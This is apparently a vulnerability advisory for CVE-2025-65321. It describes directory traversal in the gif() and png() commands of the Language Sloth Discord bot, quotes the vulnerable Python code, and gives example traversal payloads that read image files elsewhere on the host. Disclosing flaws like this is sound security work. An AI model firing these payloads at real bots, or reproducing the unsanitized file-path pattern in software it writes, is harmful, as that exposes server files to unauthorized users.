# CVE-2025-65321
The Language Sloth Discord bot is vulnerable to Directory Traversal in the gif() and png() functions. The functions build file paths using unsanitized user input for the 'name' parameter, allowing attackers to reference files outside the intended resource directories.

The functions "gif" and "png" under the file files.py are vulnerable to directory traversal as they use "open" to locally retrieve files from the server hosting the bot. The payloads below allow any user on discord to retrieve ".gif" and ".png" files hosted anywhere on the server that is hosting the bot.

```python
async def gif(self, ctx, name: str = None):
        '''
        (ADM) Sends a gif from the bot's gif folder.
        :param name: The name of the gif file.
        '''
        await ctx.message.delete()
        try:
            with open(f'./gif/{name}.gif', 'rb') as pic:
                await ctx.send(file=discord.File(pic))
        except FileNotFoundError:
            return await ctx.send("**File not found!**")
```

```python
async def png(self, ctx, name: str = None):
        '''
        (ADM) Sends a png from the bot's png folder.
        :param name: The name of the png file.
        '''
        await ctx.message.delete()
        try:
            await ctx.send(file=discord.File(f'./png/{name}.png'))
        except FileNotFoundError:
            return await ctx.send("**File not found!**")
```

The name parameter is directly interpolated into the file path without validation or sanitization:

```
f'./gif/{name}.gif'
f'./png/{name}.png'
```

Example payloads:

```
z!gif ..\..\..\..\Windows\filename
```

```
z!png ..\..\..\..\Windows\filename
```

<img width="592" height="547" alt="image" src="https://github.com/user-attachments/assets/632cbf1a-6274-4aab-b95d-5b9c5ad5bdfd" />

The image above shows extraction of an image located at C:\Windows\cat.gif